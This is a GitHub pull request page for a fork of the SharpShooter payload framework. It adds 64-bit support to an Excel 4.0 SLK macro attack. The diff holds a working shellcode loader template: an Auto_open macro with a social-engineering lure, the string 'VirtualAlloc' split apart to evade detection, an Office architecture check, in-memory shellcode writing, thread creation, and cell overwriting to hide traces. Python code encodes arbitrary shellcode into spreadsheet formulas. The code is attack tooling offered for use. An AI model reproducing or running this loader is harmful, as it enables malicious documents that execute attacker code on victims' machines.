Skip to content

- Added compatibility to 64 bit SLK attack. #28

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
spamv wants to merge 3 commits into
base: master
Choose a base branch
from
Open

- Added compatibility to 64 bit SLK attack. #28

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
3 commits
Select commit Hold shift + click to select a range
5cc1f25
- Added compatibility to 64 bit SLK attack.
Nov 10, 2019
3e14c5f
Update Readme.md
spamv Nov 14, 2019
df877df
Modified: Office architecture detection
Feb 13, 2020
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
3 changes: 2 additions & 1 deletion Readme.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -10,6 +10,7 @@

Description
===========
====SharpShooter fork to add compatibility for 64-bit processes for the .SLK Macros 4.0 attack.====

SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code.
SharpShooter is capable of creating payloads in a variety of formats, including HTA, JS, VBS and WSF. It leverages James Forshaw's [DotNetToJavaScript](https://github.com/tyranid/DotNetToJScript) tool to invoke methods from the SharpShooter DotNet serialised object. Payloads can be retrieved using Web or DNS delivery or both; SharpShooter is compatible with the MDSec ActiveBreach PowerDNS project. Alternatively, stageless payloads with embedded shellcode execution can also be generated for the same scripting formats.
Expand Down Expand Up @@ -160,4 +161,4 @@ Credits:
- [@buffaloverflow](https://twitter.com/buffaloverflow): Rich Warren for Demiguise
- [@arvanaghi](https://twitter.com/arvanaghi) and [@ChrisTruncer](https://twitter.com/ChrisTruncer): Brandon Arvanaghi and Chris Truncer for CheckPlease
- [@subTee](https://twitter.com/subtee): Documentation for Squiblydoo and Squiblytwo techniques
- [@StanHacked](https://twitter.com/stanhacked): Excel 4.0 technique and code examples
- [@StanHacked](https://twitter.com/stanhacked): Excel 4.0 technique and code examples
4 changes: 2 additions & 2 deletions SharpShooter.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -64,6 +64,7 @@ def validate_args(self):
parser.add_argument("--amsi", metavar="<amsi>", dest="amsi", default=None, help="Use amsi bypass technique: amsienable")
parser.add_argument("--delivery", metavar="<type>", dest="delivery", default=None, help="Delivery method: web, dns, both")
parser.add_argument("--rawscfile", metavar="<path>", dest="rawscfile", default=None, help="Path to raw shellcode file for stageless payloads")
parser.add_argument("--rawscfile64", metavar="<path>", dest="rawscfile64", default=None, help="Path to raw shellcode file for stageless payloads. [64bit shellcode]")
parser.add_argument("--shellcode", action='store_true', help="Use built in shellcode execution")
parser.add_argument("--scfile", metavar="<path>", dest="shellcode_file", default=None, help="Path to shellcode file as CSharp byte array")
parser.add_argument("--refs", metavar="<refs>", dest="refs", default=None, help="References required to compile custom CSharp,\ne.g. mscorlib.dll,System.Windows.Forms.dll")
Expand Down Expand Up @@ -559,8 +560,7 @@ def run(self, args):
f.write(macro_stager)

if(payload_type == 9):
payload = excel4.generate_slk(args.rawscfile)

payload = excel4.generate_slk(args.rawscfile, args.rawscfile64)
if(args.comtechnique):
if not args.awltechnique or args.awltechnique == "wmic":
payload_file = "output/" + outputfile + ".xsl"
Expand Down
79 changes: 57 additions & 22 deletions modules/excel4.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -10,43 +10,78 @@ def bytes2int(str):

SHELLCODE_HEADER = """ID;P
O;E
NN;NAuto_open;ER1C1;KSpreadsheet;F
C;X1;Y1;K0;ER1C2()
C;X1;Y2;K0;ECALL("Kernel32","VirtualAlloc","JJJJJ",0,1000000,4096,64)
C;X1;Y3;K0;ESELECT(R1C2:R1000:C2,R1C2)
C;X1;Y4;K0;ESET.VALUE(R1C3, 0)
C;X1;Y5;K0;EWHILE(LEN(ACTIVE.CELL())>0)
C;X1;Y6;K0;ECALL("Kernel32","WriteProcessMemory","JJJCJJ",-1, R2C1 + R1C3 * 20,ACTIVE.CELL(), LEN(ACTIVE.CELL()), 0)
C;X1;Y7;K0;ESET.VALUE(R1C3, R1C3 + 1)
C;X1;Y8;K0;ESELECT(, "R[1]C")
C;X1;Y9;K0;ENEXT()
C;X1;Y10;K0;ECALL("Kernel32","CreateThread","JJJJJJJ",0, 0, R2C1, 0, 0, 0)
C;X1;Y11;K0;EHALT()
NN;NAuto_open;ER5C102;KSpreadsheet;F
C;X1;Y1;K"Enable Content to update file encoding."
C;X102;Y1;K"Vir"
C;X102;Y2;K"tual"
C;X102;Y3;K"All"
C;X102;Y4;K"oc"
C;X102;Y5;K0;ECONCATENATE(R1C102,R2C102,R3C102,R4C102)
C;X102;Y6;K0;ER1C103()
C;X103;Y1;K0;EERROR(FALSE, R2C103:R3C103)
C;X103;Y2;K""C:\\Program Files (x86)\\Microsoft Office\\root""
C;X103;Y3;K0;EDIRECTORY(R2C103)
C;X103;Y4;K0;EIF(ISERROR(R3C103), R1C100(), R1C104())
C;X104;Y1;K0;ER1C105()
C;X104;Y2;K0;ECALL("Kernel32",R5C102,"JJJJJ",0,%s,4096,64)
C;X104;Y3;K0;ESELECT(R1C105:R1000:C105,R1C105)
C;X104;Y4;K0;ESET.VALUE(R1C99, 0)
C;X104;Y5;K0;EWHILE(LEN(ACTIVE.CELL())>0)
C;X104;Y6;K0;ECALL("Kernel32","WriteProcessMemory","JJJCJJ",-1, R2C104 + R1C99 * 20,ACTIVE.CELL(), LEN(ACTIVE.CELL()), 0)
C;X104;Y7;K0;ESET.VALUE(R1C99, R1C99 + 1)
C;X104;Y8;K0;ESELECT(, "R[1]C")
C;X104;Y9;K0;ENEXT()
C;X104;Y10;K0;ECALL("Kernel32","CreateThread","JJJJJJJ",0, 0, R2C104, 0, 0, 0)
C;X104;Y11;K0;ER11C100()
C;X100;Y1;K0;ER1C101()
C;X100;Y2;K0;ECALL("Kernel32",R5C102,"JJJJJ",1342177280,%s,12288,64)
C;X100;Y3;K0;ESELECT(R1C101:R1000:C101,R1C101)
C;X100;Y4;K0;ESET.VALUE(R1C99, 0)
C;X100;Y5;K0;EWHILE(LEN(ACTIVE.CELL())>0)
C;X100;Y6;K0;ECALL("kernel32", "RtlCopyMemory", "JJCJ",R2C100 + R1C99 * 20,ACTIVE.CELL(),LEN(ACTIVE.CELL()))
C;X100;Y7;K0;ESET.VALUE(R1C99, R1C99 + 1)
C;X100;Y8;K0;ESELECT(, "R[1]C")
C;X100;Y9;K0;ENEXT()
C;X100;Y10;K0;ECALL("Kernel32","CreateThread","JJJJJJJ",0, 0, R2C100, 0, 0, 0)
C;X100;Y11;K0;ESELECT(R1C1, R1C1)
C;X100;Y12;K0;ESET.VALUE(R1C1, "AAAAAAA")
C;X100;Y13;K0;ESET.VALUE(R2C1, "BBBBBBB")
C;X100;Y14;K0;ESET.VALUE(R3C1, "CCCCCCC")
C;X100;Y15;K0;ESET.VALUE(R4C1, "DDDDDDD")
C;X100;Y16;K0;ESET.VALUE(R5C1, "EEEEEEE")
C;X100;Y17;K0;ESET.VALUE(R6C1, "FFFFFFF")
C;X100;Y28;K0;EHALT()
"""

def generate_slk(shellcode_path):
return build_shellcode_slk(shellcode_path)
def generate_slk(shellcode_path, shellcode_path64):
return build_shellcode_slk(shellcode_path, shellcode_path64)

def build_shellcode_slk(shellcode_path):
def build_shellcode_slk(shellcode_path, shellcode_path64):
#print("[*] Building shellcode exec SLK")
slk_shellcode_32, size32 = build_shellcode_arch(shellcode_path, 105)
slk_shellcode_64, size64 = build_shellcode_arch(shellcode_path64, 101)
slk_output = SHELLCODE_HEADER % (size32, size64)
slk_output+= slk_shellcode_32 + slk_shellcode_64 + "\nE"
return slk_output

slk_output = SHELLCODE_HEADER
def build_shellcode_arch(shellcode_path, raw):
output = ""
with open(shellcode_path, "rb") as f:
byte = f.read(1)
i = 0
cell=0
while byte != "":
if i == 0:
cell=cell+1
slk_output+=("C;X2;Y%s;K0;E" % (str(cell)))
output+=("C;X%s;Y%s;K0;E" % (raw, str(cell)))
else:
slk_output+=("&")
slk_output+=("CHAR(" + str(bytes2int(byte)) + ")")
output+=("&")
output+=("CHAR(" + str(bytes2int(byte)) + ")")
byte = f.read(1)
i+=1
if i == 20:
slk_output+=("\n")
output+=("\n")
i = 0
cell=cell+1
slk_output+=("\nC;X2;Y%s;K0;ERETURN()\nE\n" % (str(cell)))
return slk_output
output+=("\nC;X%s;Y%s;K0;ERETURN()\n" % (raw, str(cell)))
return output, cell * 20